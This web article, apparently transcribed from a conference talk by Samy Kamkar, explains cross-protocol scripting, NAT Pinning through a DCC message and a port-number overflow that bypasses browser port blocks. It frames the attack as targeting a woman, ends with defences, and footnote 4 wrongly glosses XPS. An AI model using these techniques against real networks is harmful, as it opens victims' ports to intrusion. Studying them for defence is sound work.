How to hack Facebook account 3: applying Cross-Protocol Scripting to attack victim’s network

Read: How to hack Facebook account: Facebook profile hacking by PHP session hijacking
Read: How to hack Facebook account 2: using LCG for Facebook profile hacking

Having hacked the targeted Facebook account, which is outlined in the previous part of the speech, Samy Kamkar manages to get into the prey’s PC using Cross-Protocol Scripting and NAT Pinning.

Well, let’s talk about something that some of you may have heard recently called Cross-Protocol Scripting (XPS). Cool thing about this is HTTP servers can run on any port. This means the browser will allow you to communicate to other HTTP servers on any port. But HTTP is a newline-based protocol. What that means is each line has some data rather than some weird, let’s say, XML formatted data, or a binary string of some sort. Sample IRC connection But there are other protocols that are also newline-based. So what we can do is we can actually communicate with a different newline-based protocol, like IRC1.

IRC is a great place, it’s good people. So take a look at the image to see what an IRC connection looks like. I telnet to a reputable server like efnet.org, I log in – my username is Samy, I respond to a PING request, and then I join a channel, and I find out, you know, where can I get WinNuke2. Well, it doesn’t work anymore. So if anyone has a version that works, please send it to me.

Code embedded in Samy's malicious web page

Code embedded in Samy's malicious web page

Let’s see how we do an IRC client on the web. What’s interesting about this is I create a malicious page that has this code running on the page (see image). You visit my malicious web page. Now your client connects to the IRC server, your web browser thinks it’s an HTTP server. And what it does is it sends HTTP request with the postdata of my IRC data. And the IRC server says “Well, I don’t understand this HTTP request, I don’t understand this line, line, line. Oh, I understand this, I understand ‘join #hackers’, I know what that means, I’ll interpret that, and I’ll just ignore all your other stuff”.

At this point, I am making your IP address connect to the IRC server. Now, this can be used for SMTP3 for example. Spammers have actually been using this for years and years, and it hasn’t been really well-known. They’ve been basically making people’s browsers become spam servers. You visit a page and, without you ever seeing, on the backend there is a form that’s connecting to an HTTP server on port 25 and auto-submitting that form, and basically you’re now sending Viagra spam. Why are you going to Viagra site – I don’t know, but it’s what they have on the back.

Samy's sample HTTP post

Samy's sample HTTP post

So, you can see on the image what an HTTP post looks like. You see basically all the HTTP headers that your browser is sending, and then you see the IRC data. Again, the IRC server ignores the data it doesn’t understand, until it hits this data it understands. So I’m bringing this up.

Let me talk about something called NAT Pinning. So it’s like XPS4 over times 9000. So what is NAT Pinning? Well, here is the thing: your web browser was confused. It thought it was communicating with an HTTP server but it was communicating with an IRC server. Now NAT Pinning takes this one step further, and basically it makes the router also confused and thinks that it’s communicating with a different protocol.

So now your router thinks it’s communicating with IRC, your browser thinks it’s communicating with HTTP, and they start doing different things. What can we do with this? Well, let’s analyze a malicious server. So you have your systems, your network devices behind your NAT. You have the malicious server that you’re going to hit a website, you’re hitting a web URL on that malicious server.

Now, if you’re familiar with IRC, there is something called the DCC. It’s basically how porn is sent over IRC, it’s great, it’s great protocol. Basically what a DCC is, it’s a direct client connection. So when you’re communicating with an IRC server, when you’re chatting with all the other really cool people, you say “You know what, I wanna send you this file, so connect directly to me, there is no point for the server bridging this file or this chat, so connect directly”.

The way that works is you send a message to that person and you say “Hey, I want you to connect back to me on this IP address, on this port. Now, years ago, routers didn’t understand this message, it was just TCP traffic. And what would happen is if you didn’t have that port open or forwarded to yourself, then the connection would never establish. People complained, you know it broke all sort of things, it broke IRC, DCC, it broke FTP, it broke SIP. So routers got smart. They started developing software that would actually watch the traffic, look for messages like this: ‘PRIVMSG samy : DCC CHAT samy’. And if they saw that message, then they would say “Oh, a client on my network is trying to get a file sent, so I’ll port-forward that port back to them”.

Well, if you recall, they’re assuming that your valid client said “I wanna do this, I actually want this person to connect back to me. But you visited my malicious website, and your browser sent this data. Well, what if I put that DCC message in the browser, in the JavaScript submit? Now you visit my website, the website submits that malicious form to just some random server and it says “I want you to connect to me on port 22 and port 80, and port 443, and 25, and 21, and 23”.

Malicious code for attacking the victim on all ports

Malicious code for attacking the victim on all ports

I’ve now just port-forwarded every port I wanna attack you on, just by you visiting my website. That’s it. The browser has no idea what’s going on, it’s just filling out its request, and I am attacking you on every single port. Check out the code on the image.

So this is really cool. Now, once the XPS stuff basically became big, the browsers start working on blocking certain ports. They say “You know what, you shouldn’t be communicating on port 6667. If you are running a web server on there – you’re stupid, choose a different port”. So they start blocking ports. So the port is 16 bits, that’s the size of a TCP or UDP port.

Now, if the browser says “You know, I am not gonna allow connection on port 6667. Does this port match 6667? No, just overflow it”. So if you add another bit and you add 65536 to it, you get this bigger number, right, 72203. Your browser says that’s not 6667, this will go just fine, it gets sent it to the TCP stack which then shortens it, and now you have 6667. I did not think of this, it was actually the respectable security group Goatse Security. They came up with this. Very good people. Very awesome, very awesome.

So at this point, Anna has clicked on my link. And now I have attacked her ports. So what did she have open? Well, a lot of OS X systems have a web server running by default. She was working on a website, so cute. So I connected back to her port 80, and saw she was making her own website about Team Jacob from ‘Twilight’. I love ‘Twilight’. Now I know how to get her. Here is the thing, I am actually on Team Edward, but I am not going to tell her that. So when I see her I’m gonna say I am on a Team Jacob.

So, how do you stop NAT Pinning? Well, there are so many ways that you wanna… well, you wanna have multiple layers. So you want a strict firewall, try to make it as strict as possible if you can. You know, if you don’t expect people using IRC on your network – block it off entirely. If you don’t expect people being able to send stuff – block off, you can actually turn off UPnP5 and other protocols that allow this type of thing to happen. Client-side, run up-to-date browsers. WebKit was vulnerable to the port overflow. I believe that is resolved now. Other browsers might still be vulnerable, I am not sure. Make sure you’re running up-to-date browsers. Use NoScript if you are using Firefox, that will block all types of things. When I released NAT Pinning, NoSript a day later added it to production. Run a local firewall if you can, like ‘Little Snitch’.

Samy's message to get Anna on another malicious website I mean, really we all understand security is not just one level of security. You basically have to use multiple layers of protection, like I would with Anna. So at this point, I know what she is into, I know how to win her over, I think. So I am gonna send her a message to get her on another malicious website (see image), and basically say: “You know what, this guy Samy, he is a really good friend of mine, he is gonna come over and take care of you, check out his Twitter”.

Read: How to hack Facebook account 4: Geolocation via cross-site scripting


1IRC (Internet Relay Chat) is a protocol for real-time Internet text messaging (chat) or synchronous conferencing.

2WinNuke is a term referring to a remote denial-of-service attack (DoS) that affected the Microsoft Windows 95, Microsoft Windows NT and Microsoft Windows 3.1x computer operating systems. It is responsible for the famous “blue screen of death”.

3SMTP (Simple Mail Transfer Protocol) is an Internet standard for electronic mail (e-mail) transmission across Internet Protocol (IP) networks.

4XPS (XML Paper Specification), also referred to as OpenXPS, is a fixed-document format originally developed by Microsoft that was later standardized as international standard ECMA-388.

5UPnP (Universal Plug and Play) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points and mobile devices to seamlessly discover each other’s presence on the network and establish functional network services for data sharing, communications, and entertainment.

Like This Article? Let Others Know!
Related Articles:

Comments are closed.

Comment via Facebook: